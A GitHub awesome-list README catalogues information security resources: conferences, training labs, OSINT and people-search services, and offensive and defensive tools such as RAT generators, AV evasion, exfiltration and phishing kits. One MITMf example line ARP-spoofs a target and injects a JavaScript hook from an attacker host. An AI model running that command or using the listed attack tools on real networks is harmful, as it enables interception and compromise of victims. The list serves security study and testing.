list-infosec-encyclopedia - A list of information security related awesome lists and other resources.

Created at: 2018-07-12 09:27:08
Language: NULL

GoVanguard InfoSec Encyclopedia

This is an ongoing compilation of resources we have found useful and tools we use. If you are new to InfoSec or are looking for a consolidated list of resources to get started, see the "Overview of InfoSec and Cybersecurity" section.

Table of Contents


Resources

Information Security Certifications

Books

Lockpicking Resources

  • /r/lockpicking Subreddit - Subreddit dedicated to the sport of lockpicking.
  • Keypicking.com - Lively online forum for discussing lockpicking and locksport.
  • LockWiki - Community-driven reference for both beginners and professionals in the security industry.
  • Lockpicking Forensics - Website "dedicated to the science and study of forensic locksmithing."
  • Lockpicking101.com - One of the longest-running online communities "dedicated to the fun and ethical hobby of lockpicking."
  • Amazing King's Lockpicking Page - Hobbyist website with detailed pages on locks, tools and picking techniques.

Social Engineering Articles

Conferences

  • (ISC)2 Secure Event Series
  • 44CON London
  • 44Con
  • AFCEA Defensive Cyber Operations Symposium
  • AppSec United States (OWASP National Conference)
  • AppSecUSA
  • Atlantic Security Conference (AtlSecCon)
  • BSides
  • BSides Event Series
  • BalCCon
  • Black Hat
  • Black Hat United States
  • BlueCon
  • CCC
  • CISO Executive Summit Series (invite-only)
  • CSO50 Conference
  • CanSecWest
  • CarolinaCon
  • Cyber Threat Intelligence Summit
  • DEF CON
  • DeepSec
  • DefCamp
  • DerbyCon
  • DerbyCon 8.0
  • Ekoparty
  • FIRST Conference
  • FSec
  • HackMiami
  • HITB
  • HOPE
  • Hack.lu
  • Hack3rCon
  • Hacker Halted - optionally includes certification-specific training
  • IANS Information Security Forum
  • IAPP Global Privacy Summit
  • IEEE Symposium on Security and Privacy
  • ISACA Cyber Security Nexus
  • ISF Annual World Congress
  • ISSA CISO Executive Forum Series
  • ISSA International Conference
  • Ignite
  • Infiltrate
  • InfoSec Southwest
  • InfoSec World
  • Infosecurity Europe
  • Infosecurity North America
  • LayerOne
  • Nullcon
  • Nullcon Conference
  • Open Security Summit
  • PhreakNIC
  • RSA Conference United States
  • SANS Annual Conference
  • SANS Pentest Annual Conference
  • SANS Security Annual Conference
  • SECUINSIDE
  • SOURCE Annual Conference
  • SecTor Canada
  • Secure360 Conference
  • SecureWorld
  • Securi-Tay
  • Security Operations Summit & Training
  • ShmooCon
  • SkyDogCon
  • SummerCon
  • Swiss Cyber Storm
  • ThotCon
  • USENIX Security Symposium
  • Virus Bulletin Conference
  • conINT
  • Secure CISO

Online Videos

Free Online Courses

Training Resources

Hacking References and Cheat Sheets

Training and Practice Exercises

  • CPTE Courseware Kit - Paid official training kit for the CPTE exam.
  • Damn Vulnerable Web Application (DVWA) - Deliberately vulnerable PHP/MySQL web application.
  • Gruyere - Gruyere is a web application with multiple security bugs, ranging from cross-site scripting and cross-site request forgery to information disclosure, denial of service and remote code execution.
  • Hack This Site - Web application security exercises.
  • Hack The Box - Online pentest lab with Windows VMs.
  • Hacker101 CTF - Web app CTF-style exercises.
  • Mutillidae - Mutillidae is a free, open source web application provided so that you can practise hacking a web application. It can be installed on Linux, Windows XP, Windows 7 and Windows 10 using XAMPP.
  • OSCP-like Vulnhub VMs - Deliberately vulnerable VMs similar to those in the OSCP.
  • OWASP Damn Vulnerable Web Sockets (DVWS) - Vulnerable web application that works on web sockets for client/server communication.
  • OWASP Juice Shop - JavaScript-based intentionally insecure web application.
  • OWASP NodeGoat - Includes a Node.js web application for learning the OWASP Top 10.
  • OWASP Railsgoat - Vulnerable version of Rails that follows the OWASP Top 10.
  • OWASP Security Shepherd - Web and mobile application security training platform.
  • OWASP WebGoat - WebGoat is a deliberately insecure application that allows you to test vulnerabilities commonly found in Java-based applications that use common and popular open source components.
  • OWASP Security Knowledge Framework - OWASP Security Knowledge Framework lab exercises, complete with write-ups.
  • Over the Wire: Natas - Web application challenges.
  • Rapid7 Metasploitable - Metasploitable is essentially a penetration testing lab in a box, available as a VMware virtual machine (VMX).
  • RopeyTasks - Deliberately vulnerable simple web application.
  • XSS exercises - Webapp cross-site scripting (XSS) bug-hunting exercises.

Useful YouTube Channels

Illustrations and Presentations

Clearnet Exploit Databases

Awesome Master Lists

Knowledge Bases

OSINT Tools We Use

General OSINT Tools

  • AbuseIPDB - Search engine for blacklisted IPs or domains.
  • AutoShun - Public repository of malicious IPs and other resources.
  • BadIP - Online blacklist lookup.
  • Barcode Reader - Decode barcodes in C#, VB, Java, C\C++, Delphi, PHP and other languages.
  • Belati - The traditional Swiss Army knife for OSINT. Belati is a tool for collecting public data and public documents from websites and other services for OSINT purposes.
  • Binary Defense IP Ban List - Public IP blacklist.
  • Blocklist Ipsets - Public IP blacklist.
  • Censys - Collects data on hosts and websites through daily ZMap and ZGrab scans.
  • CloudFrunt - Tool for identifying misconfigured CloudFront domains.
  • Combine - Open source threat intelligence feed gathering tool.
  • Creepy - Geolocation OSINT tool.
  • Datasploit - Tool for performing various OSINT techniques on usernames, email addresses and domains.
  • Dnsenum - Perl script that enumerates DNS information from a domain, attempts zone transfers, performs a brute force dictionary-style attack, and then performs reverse look-ups on the results.
  • Dnsmap - Passive DNS network mapper.
  • Dnsrecon - DNS enumeration script.
  • Dnstracer - Determines where a given DNS server gets its information from, and follows the chain of DNS servers.
  • Dork-cli - Command-line Google dork tool.
  • emagnet - Automated hacking tool that finds leaked databases.
  • FindFrontableDomains - Multithreaded tool for finding frontable domains.
  • GOSINT - OSINT tool with multiple modules and a Telegram scraper.
  • Github-dorks - CLI tool to scan GitHub repos/organizations for potential sensitive information leaks.
  • GooDork - Command-line Google dorking tool.
  • Google Hacking Database - Database of Google dorks; can be used for recon.
  • GreyNoise - "Anti-threat intelligence." GreyNoise characterizes the background noise of the internet so users can focus on what actually matters.
  • InfoByIp - Domain and IP bulk lookup tool.
  • Intrigue Core - Framework for attack surface discovery.
  • Machinae - Multipurpose OSINT tool using threat intelligence feeds.
  • Maltego - Proprietary software for open source intelligence and forensics, from Paterva.
  • Malware Domain List - Search and share malicious URLs.
  • NetBootcamp OSINT Tools
  • OSINT Framework
  • OpenRefine - Free & open source power tool for working with messy data and improving it.
  • Orbit - Draws relationships between crypto wallets with recursive crawling of transaction history.
  • OsintStalker - Python script for Facebook and geolocation OSINT.
  • Outwit - Find, grab and organize all kinds of data and media from online sources.
  • PaGoDo - Passive, automated Google dorking tool.
  • Passive DNS Client - Library and query tool for querying several passive DNS providers.
  • PassiveDNS - Network sniffer that logs all DNS server replies for use in a passive DNS setup.
  • Photon - Crawler designed for OSINT.
  • Pown Recon - Target reconnaissance framework powered by graph theory.
  • QuickCode - Python and R data analysis environment.
  • Raven - LinkedIn information gathering tool.
  • Recon-ng - Full-featured web reconnaissance framework written in Python.
  • SecApps Recon - Information gathering and target reconnaissance tool and UI.
  • SpamCop - IP-based blacklist.
  • Spamhaus - Online blacklist lookup.
  • SpiderFoot - Open source OSINT automation tool with a web UI and report visualizations.
  • ThreatCrowd - Threat search engine.
  • ThreatTracker - Python-based IOC tracker.
  • Vcsmap - Plugin-based tool to scan public version control systems for sensitive information.
  • XRay - XRay is a tool for recon, mapping and OSINT gathering from public networks.
  • - Find email addresses of GitHub users.
  • malc0de DNSSinkhole - List of domains that have been identified as distributing malware during the past 30 days.
  • malc0de Database - Searchable incident database.
  • pygreynoise - Greynoise Python Library
  • sn0int - Semi-automatic OSINT framework and package manager.
  • theHarvester - E-mail, subdomain and people name harvester.

Crypto OSINT Search

Government Record Search

  • Blackbook - Starting point for public records.
  • FOIA Search - Government information request portal.
  • PACER - Public access to federal court records.
  • RECAP - Free version of PACER. Includes browser extensions for Chrome and Firefox.
  • SSN Validator - Verify valid Social Security Numbers.

National Search Engines

Localized search engines by country.

Meta Search

Lesser-known and less-used search engines.

Visual Search and Clustering Search Engines

Search engines that scrape multiple sites (Google, Yahoo, Bing, Goo, etc.) simultaneously and return the results.

  • Carrot2 - Organizes search results into topics.
  • Yippy - Searches multiple sources at once.

Document and Slide Search

Search data found in PDFs, Word documents, presentation slides and more.

Pastebin Search

  • Pastebin - Pastebin is a website where you can store any text online for easy sharing.

Code Search

Search through website source code.

  • NerdyData - Search engine for source code.
  • SearchCode - Helps you find real-world examples of functions, APIs and libraries across 10+ sources.

Real-Time Search, Social Media Search, and General Social Media Tools

Twitter Search

Facebook Search

Instagram Search

Pinterest Search

Reddit Search

Tools to help you learn more about a reddit user or subreddit.

VKontakte Search

Perform various OSINT on the Russian social media site VKontakte.

Blog Search

Username Check

People Investigations

Email Search / Email Check

Phone Number Research

  • National Cellular Directory - Created to help people research and reconnect with each other by performing cell phone lookups. Lookup products include billions of records that can be accessed at any time, and free searches for one hour every day.
  • Reverse Phone Lookup - Detailed information about the phone carrier, region, service provider, and switch information.
  • Spy Dialer - Get the voicemail of a cell phone & owner name lookup.
  • Twilio - Look up a phone number's carrier type, location, and more.
  • Phone Validator - Fairly accurate phone lookup service, especially good against Google Voice numbers.

Company Research

Domain and IP Research

Keywords Discovery and Research

Web History and Website Capture

Image Search

Image Analysis

Web Monitoring

Social Network Analysis

DNS Search And Enumeration

  • Amass - The amass tool searches Internet data sources, performs brute force subdomain enumeration, searches web archives, and uses machine learning to generate additional subdomain name guesses. DNS name resolution is performed across many public servers so the authoritative server will see the traffic coming from different locations. Written in Go.

Network Reconnaissance Tools

  • ACLight - Script for advanced discovery of sensitive Privileged Accounts - includes Shadow Admins.
  • BuiltWith - Technology lookup tool for websites.
  • CloudFail - Unmask server IP addresses hidden behind Cloudflare by searching old database records and detecting misconfigured DNS.
  • LdapMiner - Multiplatform LDAP enumeration utility.
  • Mass Scan - TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.
  • Netdiscover - Simple and quick network scanning tool.
  • Pentest-Tools - Online suite of various different pentest related tools.
  • Ruler - Tool for remotely interacting with Exchange servers.
  • Shodan - Database containing information on all accessible domains on the internet obtained from passive scanning.
  • Spyse - Web research services that scan the entire internet using OSINT, to simplify the investigation of infrastructure and attack surfaces.
  • Spyse.py - Python API wrapper and command-line client for the tools hosted on spyse.com.
  • Sublist3r - Subdomain enumeration tool for penetration testers.
  • ldapsearch - Linux command line utility for querying LDAP servers.
  • nmap - Free security scanner for network exploration & security audits.
  • pyShodan - Python 3 script for interacting with Shodan API (requires valid API key).
  • smbmap - Handy SMB enumeration tool.
  • xprobe2 - Open source operating system fingerprinting tool.
  • zmap - Open source network scanner that enables researchers to easily perform Internet-wide network studies.

Exploitation Enumeration And Data Recovery Tools

Penetration Testing OS Distributions

  • ArchStrike - Arch GNU/Linux repository for security professionals and enthusiasts.
  • AttifyOS - GNU/Linux distribution focused on tools useful during Internet of Things (IoT) security assessments.
  • BackBox - Ubuntu-based distribution for penetration tests and security assessments.
  • BlackArch - Arch GNU/Linux-based distribution for penetration testers and security researchers.
  • Buscador - GNU/Linux virtual machine that is pre-configured for online investigators.
  • Fedora Security Lab - Provides a safe test environment to work on security auditing, forensics, system rescue and teaching security testing methodologies.
  • Kali - GNU/Linux distribution designed for digital forensics and penetration testing.
  • Network Security Toolkit (NST) - Fedora-based bootable live operating system designed to provide easy access to best-of-breed open source network security applications.
  • Parrot Security OS - Distribution similar to Kali using the same repositories, but with additional features such as Tor and I2P integration.
  • The Pentesters Framework - Distro organized around the Penetration Testing Execution Standard (PTES), providing a curated collection of utilities that eliminates often unused toolchains.

Multi-paradigm Frameworks

  • Armitage - Java-based GUI front-end for the Metasploit Framework.
  • AutoSploit - Automated mass exploiter, which collects target by employing the Shodan.io API and programmatically chooses Metasploit exploit modules based on the Shodan query.
  • Faraday - Multiuser integrated pentesting environment for red teams performing cooperative penetration tests, security audits, and risk assessments.
  • Habu Hacking Toolkit - Unified set of tools spanning passive reconnaissance, network attacks, social media monitoring, and website fingerprinting.
  • Mad-Metasploit - Additional scripts for Metasploit.
  • Metasploit - Software for offensive security teams to help verify vulnerabilities and manage security assessments.
  • Mobile Security Framework (MobSF) - Automated mobile application pentesting framework capable of static analysis, dynamic analysis, malware analysis, and web API testing.
  • Pupy - Cross-platform (Windows, Linux, macOS, Android) remote administration and post-exploitation tool.
  • Rupture - Multipurpose tool capable of man-in-the-middle attacks, BREACH attacks and other compression-based crypto attacks.

Network Vulnerability Scanners

  • Nessus - Commercial network vulnerability scanner.
  • Nexpose - Commercial vulnerability and risk management assessment engine that integrates with Metasploit, sold by Rapid7.
  • OpenVAS - Open source implementation of the popular Nessus vulnerability assessment system.
  • Vuls - Agentless Linux/FreeBSD vulnerability scanner written in Go.

Web Vulnerability Scanners

  • ACSTIS - Automated client-side template injection (sandbox escape/bypass) detection for AngularJS.
  • Burp Suite - Commercial web vulnerability scanner, with limited community edition.
  • cms-explorer - Reveal the specific modules, plugins, components and themes that various websites powered by content management systems are running.
  • Netsparker Web Application Security Scanner - Commercial web application security scanner to automatically find many different types of security flaws.
  • Nikto - Noisy but fast black box web server and web application vulnerability scanner.
  • Observatory - Free online web scanning utility.
  • OWASP Zed Attack Proxy (ZAP) - Feature-rich, scriptable HTTP intercepting proxy and fuzzer for penetration testing web applications.
  • Security Headers - Free online utility for checking a website's HTTP headers for security vulnerabilities.
  • SQLmate - A friend of sqlmap that identifies sqli vulnerabilities based on a given dork and website (optional).
  • WPScan - Black box WordPress vulnerability scanner.

Web Exploitation

  • Browser Exploitation Framework (BeEF) - Command and control server for delivering exploits to commandeered Web browsers.
  • Commix - Automated all-in-one operating system command injection and exploitation tool.
  • Drupwn - Drupal web application exploitation tool.
  • EyeWitness - Tool to take screenshots of websites, provide some server header info, and identify default credentials if possible.
  • fimap - Find, prepare, audit, exploit and even Google automatically for LFI/RFI bugs.
  • FuzzDB - Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.
  • IIS-Shortname-Scanner - Command line tool to exploit the Windows IIS tilde information disclosure vulnerability.
  • Kadabra - Automatic LFI exploiter and scanner.
  • Kadimus - LFI scan and exploit tool.
  • LFISuite - A tool designed to exploit Local File Include vulnerabilities.
  • libformatstr - Python script designed to simplify format string exploits.
  • liffy - LFI exploitation tool.
  • lyncsmash - A collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations.
  • NoSQLmap - Automatic NoSQL injection and database takeover tool.
  • SQLmap - Automated SQL injection and database takeover tool.
  • sqlninja - Automated SQL injection and database takeover tool.
  • sslstrip2 - SSLStrip version to defeat HSTS.
  • sslstrip - Demonstration of the HTTPS stripping attacks.
  • tplmap - Automatic server-side template injection and Web server takeover tool.
  • VHostScan - A virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, aliases and dynamic default pages.
  • wafw00f - Identifies and fingerprints Web Application Firewall (WAF) products.
  • webscreenshot - A simple script to take screenshots from a list of websites.
  • weevely3 - Weaponized web shell.
  • Wordpress Exploit Framework - Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.
  • WPSploit - Exploit WordPress-powered websites with Metasploit.

Network Tools

  • dnstwist - Domain name permutation engine for detecting typo squatting, phishing and corporate espionage.
  • dsniff - Collection of tools for network auditing and pentesting.
  • enumdb - MySQL and MSSQL bruteforce utility.
  • FireAway - Firewall audit and security bypass tool.
  • impacket - Collection of Python classes for working with network protocols.
  • Intercepter-NG - Multifunctional network toolkit.
  • kerbrute - A tool to perform Kerberos pre-auth bruteforcing.
  • Low Orbit Ion Cannon (LOIC) - Open source network stress testing tool.
  • Ncat - TCP/IP command line utility supporting multiple protocols.
  • netcut - ARP based utility for discovering and spoofing MAC addresses and enabling/disabling network connectivity on network devices.
  • Network-Tools.com - Website offering an interface to numerous basic network utilities like ping, traceroute, whois, and more.
  • patator - Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.
  • pig - GNU/Linux packet crafting tool.
  • Praeda - Automated multi-function printer data harvester for gathering usable data during security assessments.
  • Printer Exploitation Toolkit (PRET) - Tool for printer security testing capable of IP and USB connectivity, fuzzing, and exploitation of PostScript, PJL, and PCL printer language features.
  • routersploit - Open source exploitation framework similar to Metasploit but dedicated to embedded devices.
  • scapy - Python-based interactive packet manipulation program & library.
  • Sockstress - TCP based DoS utility.
  • SPARTA - Graphical interface offering scriptable, configurable access to existing network infrastructure scanning and enumeration tools.
  • Spyse - Web research services that scan the entire internet using OSINT, to simplify the investigation of infrastructure and attack surfaces.
  • Spyse.py - Python API wrapper and command-line client for the tools hosted on spyse.com.
  • THC Hydra - Online password cracking tool with built-in support for many network protocols, including HTTP, SMB, FTP, telnet, ICQ, MySQL, LDAP, IMAP, VNC, and more.
  • UFONet - Layer 7 DDoS/DoS tool.
  • Zarp - Multipurpose network attack tool, both wired and wireless.

Protocol Analyzers and Sniffers

  • tcpdump/libpcap - Common packet analyzer that runs under the command line.
  • Wireshark - Widely-used graphical, cross-platform network protocol analyzer.
  • Yersinia - Packet and protocol analyzer with MITM capability.
  • Fiddler - Cross platform packet capturing tool for capturing HTTP/HTTPS traffic.
  • netsniff-ng - Swiss army knife for Linux network sniffing.
  • Dshell - Network forensic analysis framework.
  • Chaosreader - Universal TCP/UDP snarfing tool that dumps session data from various protocols.

Proxies and MITM Tools

  • BetterCAP - Modular, portable and easily extensible MITM framework.
  • dnschef - Highly configurable DNS proxy for pentesters.
  • Ettercap - Comprehensive, mature suite for machine-in-the-middle attacks.
  • evilgrade - Modular framework to take advantage of poor upgrade implementations by injecting fake updates.
  • mallory - HTTP/HTTPS proxy over SSH.
  • MITMf - Multipurpose man-in-the-middle framework.
    • e.g. mitmf --arp --spoof -i eth0 --gateway 192.168.1.1 --targets 192.168.1.20 --inject --js-url http://192.168.1.137:3000/hook.js
  • mitmproxy - Interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.
  • Morpheus - Automated ettercap TCP/IP Hijacking tool.
  • Responder - Open source NBT-NS, LLMNR, and MDNS poisoner.
  • Responder-Windows - Windows version of the above NBT-NS/LLMNR/MDNS poisoner.
  • SSH MITM - Intercept SSH connections with a proxy; all plaintext passwords and sessions are logged to disk.

Wireless Network Tools

  • Aircrack-ng - Set of tools for auditing wireless networks.
  • BetterCAP - Wifi, Bluetooth LE, and HID reconnaissance and MITM attack framework, written in Go.
  • Fluxion - Suite of automated social engineering based WPA attacks.
  • Kismet - Wireless network discovery tool.
  • MANA Toolkit - Rogue AP and man-in-the-middle utility.
  • NetStumbler - WLAN scanning tool.
  • WiFi Pumpkin - All in one Wi-Fi exploitation and spoofing utility.
  • wifi-pickle - Fake access point attacks.
  • Wifite - Automated wireless attack tool.

Transport Layer Security Tools

  • tlssled - Comprehensive TLS/SSL testing suite.
  • SSLscan - Quick command line SSL/TLS analyzer.
  • SSLyze - Fast and comprehensive TLS/SSL configuration analyzer to help identify security mis-configurations.
  • SSL Labs - Online TLS/SSL testing suite for revealing supported TLS/SSL versions and ciphers.
  • crackpkcs12 - Multithreaded program to crack PKCS#12 files (.p12 and .pfx extensions), such as TLS/SSL certificates.
  • spoodle - Mass subdomain + POODLE vulnerability scanner.
  • SMTP TLS Checker - Online TLS/SSL testing suite for SMTP servers.

Cryptography

  • FeatherDuster - Analysis tool for discovering flaws in cryptography.
  • rsatool - Tool for calculating RSA and RSA-CRT parameters.
  • xortool - XOR cipher analysis tool.

Post-Exploitation

  • CrackMapExec - Multipurpose post-exploitation suite containing many plugins.
  • DBC2 - Multipurpose post-exploitation tool.
  • Empire - PowerShell based (Windows) and Python based (Linux/OS X) post-exploitation framework.
  • EvilOSX - macOS backdoor with docker support.
  • Fathomless - A collection of post-exploitation tools for both Linux and Windows systems.
  • FruityC2 - Open source, agent-based post-exploitation framework with a web UI for management.
  • Koadic - Windows post-exploitation rootkit, primarily utilizing Windows Script Host.
  • PlugBot - Can be installed onto an ARM device for Command & Control use and more.
  • Portia - Automated post-exploitation tool for lateral movement and privilege escalation.
  • ProcessHider - Post-exploitation tool for hiding processes.
  • Pupy - Open source cross-platform post-exploitation tool, mostly written in Python.
  • RemoteRecon - Post-exploitation utility making use of multiple agents to perform different tasks.
  • TheFatRat - Tool designed to generate remote access trojans (backdoors) with msfvenom.
  • p0wnedShell - PowerShell based post-exploitation utility utilizing .NET.
  • poet - Simple but multipurpose post-exploitation tool.

Exfiltration Tools

  • Data Exfiltration Toolkit (DET) - Proof of concept to perform data exfiltration using either single or multiple channel(s) at the same time.
  • dnsteal - Fake DNS server for stealthily extracting files.
  • HTTPTunnel - Tunnel data over pure HTTP GET/POST requests.
  • Iodine - Tunnel IPv4 data through a DNS server; useful for exfiltration from networks where Internet access is firewalled, but DNS queries are allowed.
  • MailSniper - Search through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.).
  • mallory - HTTP/HTTPS proxy over SSH.
  • mimikatz - Credentials extraction tool for Windows operating system.
  • mimikittenz - Post-exploitation PowerShell tool for extracting data from process memory.
  • PANHunt - Search file systems for credit cards.
  • PassHunt - Search file systems for passwords.
  • ptunnel-ng - Tunnel IPv4 traffic through ICMP pings; slow but stealthy when normal IP exfiltration traffic is blocked.
  • pwnat - Punches holes in firewalls and NATs.
  • spYDyishai - Local Google credentials exfiltration tool, written in Python.
  • tgcd - Simple Unix network utility to extend the accessibility of TCP/IP based network services beyond firewalls.

Static Analyzers

  • Androbugs-Framework - Android program vulnerability analysis tool.
  • Androwarn - Android static code analysis tool.
  • APKinspector - Android APK analysis tool with GUI.
  • bandit - Security oriented static analyser for python code.
  • Brakeman - Static analysis security vulnerability scanner for Ruby on Rails applications.
  • Codebeat (open source) - Open source implementation of commercial static code analysis tool with GitHub integration.
  • Codelyzer - A set of tslint rules for static code analysis of Angular TypeScript projects. You can run the static code analyzer over web apps, NativeScript, Ionic, etc.
  • cppcheck - Extensible C/C++ static analyzer focused on finding bugs.
  • FindBugs - Free software static analyzer to look for bugs in Java code.
  • Icewater - 16,432 free Yara rules.
  • Joint Advanced Defense Assessment for Android Applications (JAADAS) - Multipurpose Android static analysis tool.
  • OWASP Dependency Check - Open source static analysis tool that enumerates dependencies used by Java and .NET software code (with experimental support for Python, Ruby, Node.js, C, and C++) and lists security vulnerabilities associated with the dependencies.
  • pefile - Static portable executable file inspector.
  • Progpilot - Static security analysis tool for PHP code.
  • Quick Android Review Kit (Qark) - Tool for finding security related Android application vulnerabilities.
  • ShellCheck - Static code analysis tool for shell script.
  • smalisca - Android static code analysis tool.
  • sobelow - Security-focused static analysis for the Phoenix Framework.
  • truffleHog - Git repo scanner.
  • Veracode - Commercial cloud platform for static code analysis, dynamic code analysis, dependency/plugin analysis, and more.
  • VisualCodeGrepper - Open source static code analysis tool with support for Java, C, C++, C#, PL/SQL, VB, and PHP. VisualCodeGrepper also conforms to OWASP best practices.
  • Yara - Static pattern analysis tool for malware researchers.

Dynamic Analyzers

  • AndroidHooker - Dynamic Android application analysis tool.
  • Androl4b - Android security virtual machine based on Ubuntu-MATE for reverse engineering and malware analysis.
  • Cheat Engine - Memory debugger and hex editor for running applications.
  • ConDroid - Android dynamic application analysis tool.
  • Cuckoo - Automated dynamic malware analysis tool.
  • DECAF - Dynamic code analysis tool.
  • droidbox - Dynamic malware analysis tool for Android, extension to DECAF.
  • drozer - Android platform dynamic vulnerability assessment tool.
  • idb - iOS app security analyzer.
  • Inspeckage - Dynamic Android package analysis tool.

Hex Editors

  • Cheat Engine - Memory debugger and hex editor for running applications.
  • Frhed - Binary file editor for Windows.
  • HexEdit.js - Browser-based hex editing.
  • Hexinator - World's finest (proprietary, commercial) Hex Editor.

File Format Analysis Tools

  • Hachoir - Python library to view and edit a binary stream as tree of fields and tools for metadata extraction.
  • Kaitai Struct - File formats and network protocols dissection language and web IDE, generating parsers in C++, C#, Java, JavaScript, Perl, PHP, Python, Ruby.
  • Veles - Binary data visualization and analysis tool.

Anti-Virus Evasion Tools

  • AntiVirus Evasion Tool (AVET) - Post-process exploits containing executable files targeted for Windows machines to avoid being recognized by antivirus software.
  • Hyperion - Runtime encryptor for 32-bit portable executables (PE .exe files).
  • peCloak.py - Automates the process of hiding a malicious Windows executable from antivirus (AV) detection.
  • peCloakCapstone - Multi-platform fork of the peCloak.py automated malware antivirus evasion tool.
  • Shellter - Dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.
  • SigThief - Stealing signatures to evade AV.
  • UniByAv - Simple obfuscator that takes raw shellcode and generates Anti-Virus friendly executables by using a brute-forcable, 32-bit XOR key.
  • Windows-SignedBinary - AV evasion tool for binary files.

Hash Cracking Tools

  • CeWL - Generates custom wordlists by spidering a target's website and collecting unique words.
  • CrackStation - Online password cracker.
  • Hashcat - Fast hash cracking utility with support for most known hashes as well as OpenCL and CUDA acceleration.
  • John the Ripper Jumbo edition - Community enhanced version of John the Ripper.
  • John the Ripper - Fast password cracker.
  • JWT Cracker - Simple HS256 JWT token brute force cracker.
  • Mentalist - Unique GUI based password wordlist generator compatible with CeWL and John the Ripper.
  • JPassword Recovery Tool - RAR bruteforce cracker. Formerly named RAR Crack.

Windows Utilities

  • Bloodhound - Graphical Active Directory trust relationship explorer.
  • Commentator - PowerShell script for adding comments to MS Office documents, and these comments can contain code to be executed.
  • DeathStar - Python script that uses Empire's RESTful API to automate gaining Domain Admin rights in Active Directory environments.
  • Empire - Pure PowerShell post-exploitation agent.
  • Fibratus - Tool for exploration and tracing of the Windows kernel.
  • GetVulnerableGPO - PowerShell based utility for finding vulnerable GPOs.
  • Headstart - Lazy man's Windows privilege escalation tool utilizing PowerSploit.
  • Hyena - NetBIOS exploitation.
  • Luckystrike - PowerShell based utility for the creation of malicious Office macro documents.
  • Magic Unicorn - Shellcode generator for numerous attack vectors, including Microsoft Office macros, PowerShell, HTML applications (HTA), or certutil (using fake certificates).
  • Mimikatz - Credentials extraction tool for Windows operating system.
  • PowerSploit - PowerShell Post-Exploitation Framework.
  • PSKernel-Primitives - Exploiting primitives for PowerShell.
  • Redsnarf - Post-exploitation tool for retrieving password hashes and credentials from Windows workstations, servers, and domain controllers.
  • Rubeus - Rubeus is a C# toolset for raw Kerberos interaction and abuses.
  • Sysinternals Suite - The Sysinternals Troubleshooting Utilities.
  • Windows Credentials Editor - Inspect logon sessions and add, change, list, and delete associated credentials, including Kerberos tickets.
  • Windows Exploit Suggester - Suggests Windows exploits based on patch levels.

GNU Linux Utilities

  • Lynis - Security auditing tool for Linux and macOS.
  • Linux Exploit Suggester - Heuristic reporting on potentially viable exploits for a given GNU/Linux system.
  • Mempodipper - Linux Kernel 2.6.39 < 3.2.2 local privilege escalation script.
  • vuls - Linux/FreeBSD agentless vulnerability scanner.

macOS Utilities

  • Bella - Bella is a pure python post-exploitation data mining tool & remote administration tool for macOS.
  • Lynis - Security auditing tool for Linux and macOS.

Social Engineering Tools

  • Beelogger - Tool for generating keyloggers.
  • Catphish - Tool for phishing and corporate espionage written in Ruby.
  • Evilginx - MITM attack framework used for phishing credentials and session cookies from any Web service.
  • Gophish - Open-Source Phishing Framework.
  • King Phisher - Phishing campaign toolkit used for creating and managing multiple simultaneous phishing attacks with custom email and server content.
  • Lucy Phishing Server - (commercial) tool to perform security awareness trainings for employees including custom phishing campaigns, malware attacks etc. Includes many useful attack templates as well as training materials to raise security awareness.
  • PhishingFrenzy - Phishing Frenzy is an Open Source Ruby on Rails application that is leveraged by penetration testers to manage email phishing campaigns.
  • SET - The Social-Engineer Toolkit from TrustedSec.
  • wifiphisher - Automated phishing attacks against Wi-Fi networks.
  • Canary Tokens - Generate tokens to automatically alert users when triggered.

Anonymity Tools

  • Freenet - Freenet is a peer-to-peer platform for censorship-resistant communication and publishing.
  • I2P - The Invisible Internet Project.
  • OnionScan - Tool for investigating the Dark Web by finding operational security issues introduced by Tor hidden service operators.
  • Tor - Free software and onion routed overlay network that helps you defend against traffic analysis.
  • What Every Browser Knows About You - Comprehensive detection page to test your own Web browser's configuration for privacy and identity leaks.

Reverse Engineering Tools

  • Balbuzard - Malware analysis tool with reverse obfuscation.
  • binwalk - Fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.
  • Capstone - Lightweight multi-platform, multi-architecture disassembly framework.
  • Cuckoo Modified API - Python API for Cuckoo Modified.
  • Cuckoo Modified - Fork of Cuckoo Sandbox with multiple improvements.
  • Cuckoo Sandbox - Open source, self-hosted automated malware analysis sandbox.
  • de4dot - .NET deobfuscator and unpacker.
  • dnSpy - Tool to reverse engineer .NET assemblies.
  • Dovehawk (https://github.com/tylabs/dovehawk) - Dovehawk is a Zeek module that automatically imports MISP indicators and reports sightings back to MISP.
  • DRAKVUF - Virtualization based agentless black-box binary analysis system.
  • Evan's Debugger - OllyDbg-like debugger for GNU/Linux.
  • FireEye Labs Obfuscated String Solver (FLOSS) - Malware deobfuscator.
  • firmware.re - Firmware analyzer.
  • HaboMalHunter - Automated malware analysis tool for Linux ELF files.
  • Hybrid Analysis - Online malware scanner.
  • Immunity Debugger - Powerful way to write exploits and analyze malware.
  • Interactive Disassembler (IDA Pro) - Proprietary multi-processor disassembler and debugger for Windows, GNU/Linux, or macOS; also has a free version, IDA Free.
  • Malaice.io - Open source malware analyzer.
  • Malheur - Automated sandbox analysis of malware behavior.
  • Medusa - Open source, cross-platform interactive disassembler.
  • Metadefender - Online file and hash analyzer.
  • NoMoreXOR - Frequency analysis tool for trying to crack 256-bit XOR keys.
  • OllyDbg - x86 debugger for Windows binaries that emphasizes binary code analysis.
  • PackerAttacker - Generic hidden code extractor for Windows malware.
  • PacketTotal - Online pcap file analyzer.
  • peda - Python Exploit Development Assistance for GDB.
  • plasma - Interactive disassembler for x86/ARM/MIPS. Generates indented pseudo-code with syntax coloring.
  • PyREBox - Python scriptable reverse engineering sandbox by Cisco Talos.
  • Radare2 - Open source, cross-platform reverse engineering framework.
  • Ragpicker - Malware analysis tool.
  • rVMI - Debugger on steroids; inspect userspace processes, kernel drivers, and preboot environments in a single tool.
  • Sandboxed Execution Environment - Framework for building sandboxed malware execution environments.
  • unXOR - Tool that guesses XOR keys using known plaintext attacks.
